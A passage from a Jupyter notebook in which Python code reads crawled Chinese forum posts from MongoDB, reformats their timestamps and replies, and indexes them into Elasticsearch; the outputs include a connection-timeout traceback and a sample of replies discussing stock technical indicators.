167 |       "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36m_raise_connection_failure\u001b[1;34m(address, error, msg_prefix)\u001b[0m\n\u001b[0;32m    281\u001b[0m         \u001b[1;32mraise\u001b[0m \u001b[0mNetworkTimeout\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmsg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    282\u001b[0m     \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 283\u001b[1;33m         \u001b[1;32mraise\u001b[0m \u001b[0mAutoReconnect\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmsg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    284\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    285\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n",
168 |       "\u001b[1;31mAutoReconnect\u001b[0m: 10.18.6.46:27001: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应，连接尝试失败。"
169 |      ]
170 |     }
171 |    ],
172 |    "source": [
173 |     "url_set = set()\n",
174 |     "for item in doc.find():\n",
175 |     "    creator=item.get('creator')\n",
176 |     "    title=item.get('title')\n",
177 |     "    content=item.get('content')\n",
178 |     "    resp_no=item.get('resp_no')\n",
179 |     "    createTime=item.get('createTime')\n",
180 |     "    \n",
181 |     "    url=item.get('url')\n",
182 |     "    if url in url_set:\n",
183 |     "        continue\n",
184 |     "    else:\n",
185 |     "        url_set.add(url)\n",
186 |     "    \n",
187 |     "    if createTime is None:\n",
188 |     "        save_db.insert_one({'url':url})\n",
189 |     "        continue\n",
190 |     "        \n",
191 |     "    createTime=datetime.datetime.strptime(createTime,'%Y-%m-%d %H:%M').strftime('%Y-%m-%dT%H:%M:%S')\n",
192 |     "\n",
193 |     "    crawlTime=item.get('crawlTime')\n",
194 |     "    crawlTime=datetime.datetime.strptime(crawlTime,'%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S')\n",
195 |     "\n",
196 |     "    \n",
197 |     "    resp_list=item.get('resp')\n",
198 |     "    last_resp_date=item.get('last_resp_date')\n",
199 |     "    last_resp_date=datetime.datetime.strptime(last_resp_date,'%Y-%m-%d %H:%M').strftime('%Y-%m-%dT%H:%M:%S')\n",
200 |     "\n",
201 |     "    _resp_list=[]\n",
202 |     "    for sub_resp in resp_list:\n",
203 |     "        resp_author = list(sub_resp.keys())[0]\n",
204 |     "        _resp_author=''.join(resp_author.split('_')[:-1])\n",
205 |     "        agree=sub_resp[resp_author][0]\n",
206 |     "        resp_content=sub_resp[resp_author][1]\n",
207 |     "        d={}\n",
208 |     "        d['resp_agree']=int(agree)\n",
209 |     "        d['resp_author']=_resp_author\n",
210 |     "        d['resp_content']=resp_content\n",
211 |     "\n",
212 |     "        _resp_list.append(d)\n",
213 |     "    # last_resp_date=item.get('last_resp_date')\n",
214 |     "\n",
215 |     "    body = {\n",
216 |     "    'creator':creator,\n",
217 |     "    'title':title,\n",
218 |     "    'content':content,\n",
219 |     "    'resp_no':int(resp_no),\n",
220 |     "    'createTime':createTime,\n",
221 |     "    'crawlTime':crawlTime,\n",
222 |     "    'url':url,\n",
223 |     "    'resp':_resp_list,\n",
224 |     "    'last_resp_date':last_resp_date\n",
225 |     "    }\n",
226 |     "\n",
227 |     "    es.index(index='jsl',doc_type='doc',body=body)"
228 |    ]
229 |   },
230 |   {
231 |    "cell_type": "code",
232 |    "execution_count": 23,
233 |    "metadata": {},
234 |    "outputs": [
235 |     {
236 |      "data": {
237 |       "text/plain": [
238 |        "'2019-03-16 09:54:43'"
239 |       ]
240 |      },
241 |      "execution_count": 23,
242 |      "metadata": {},
243 |      "output_type": "execute_result"
244 |     }
245 |    ],
246 |    "source": [
247 |     "crawlTime"
248 |    ]
249 |   },
250 |   {
251 |    "cell_type": "code",
252 |    "execution_count": 19,
253 |    "metadata": {},
254 |    "outputs": [
255 |     {
256 |      "data": {
257 |       "text/plain": [
258 |        "[{'resp_agree': 0,\n",
259 |        "  'resp_author': 'seeker24680',\n",
260 |        "  'resp_content': '可以说很多不明觉厉的词，适合用于忽悠别人，具体效果同风水先生。'},\n",
261 |        " {'resp_agree': 0,\n",
262 |        "  'resp_author': 'joyfulli',\n",
263 |        "  'resp_content': '首先要知道技术指标是怎么来的\\n对过去的数据进行统计分析，然后进行预测\\n说白了就是统计学\\n所以，学过统计学就知道技术分析怎么用了'},\n",
264 |        " {'resp_agree': 0, 'resp_author': '老高0813', 'resp_content': '基本没卵用'},\n",
265 |        " {'resp_agree': 0, 'resp_author': 'z383788052', 'resp_content': '从来只看指标，只看k'},\n",
266 |        " {'resp_agree': 0,\n",
267 |        "  'resp_author': '花园小琴',\n",
268 |        "  'resp_content': '看图形，一般只看低买高卖，但事后后悔，赚少了'},\n",
269 |        " {'resp_agree': 0,\n",
270 |        "  'resp_author': '风险搬运工',\n",
271 |        "  'resp_content': '趋势（多和空）和震荡结合得做（同时做），不做单边、所谓轮动策略。\\n倾向于胜率低，赔率高的策略。'},\n",
272 |        " {'resp_agree': 0,\n",
273 |        "  'resp_author': 'smag',\n",
274 |        "  'resp_content': '基本不看指标，静下心感受波动，在波动中下注。。。'},\n",
275 |        " {'resp_agree': 0, 'resp_author': '海浪头头', 'resp_content': '同意美棠子的看法'},\n",
276 |        " {'resp_agree': 0,\n",
277 |        "  'resp_author': 'jsl0900',\n",
278 |        "  'resp_content': '从技术指标上看，我可以预测所有交易标的的后续走势，至于准确不准确，那不是我关心的问题'},\n",
279 |        " {'resp_agree': 4,\n",
280 |        "  'resp_author': '美棠子',\n",
281 |        "  'resp_content': '只是个辅助工具，基本面是核心，切不可颠倒主次。'},\n",
282 |        " {'resp_agree': 0, 'resp_author': '蔓越橘', 'resp_content': '用于T一下可以，其他就算了吧。'}]"
283 |       ]
284 |      },
285 |      "execution_count": 19,
286 |      "metadata": {},
287 |      "output_type": "execute_result"
288 |     }
289 |    ],
290 |    "source": [
291 |     "_resp_list"
292 |    ]
293 |   },
294 |   {
295 |    "cell_type": "code",
296 |    "execution_count": null,
297 |    "metadata": {
298 |     "scrolled": true
299 |    },
300 |    "outputs": [],
301 |    "source": [
302 |     "for item in doc.find_one():\n"
303 |    ]
304 |   },
305 |   {
306 |    "cell_type": "code",
307 |    "execution_count": null,
308 |    "metadata": {},
309 |    "outputs": [],
310 |    "source": [
311 |     "db"
312 |    ]
313 |   }
314 |  ],
315 |  "metadata": {
316 |   "kernelspec": {
317 |    "display_name": "Python 3",
318 |    "language": "python",
319 |    "name": "python3"
320 |   },
321 |   "language_info": {
322 |    "codemirror_mode": {
323 |     "name": "ipython",
324 |     "version": 3
325 |    },
326 |    "file_extension": ".py",
327 |    "mimetype": "text/x-python",
328 |    "name": "python",
329 |    "nbconvert_exporter": "python",
330 |    "pygments_lexer": "ipython3",
331 |    "version": "3.7.0"
332 |   }
333 |  },
334 |  "nbformat": 4,
335 |  "nbformat_minor": 2
336 | }
337 | 


--------------------------------------------------------------------------------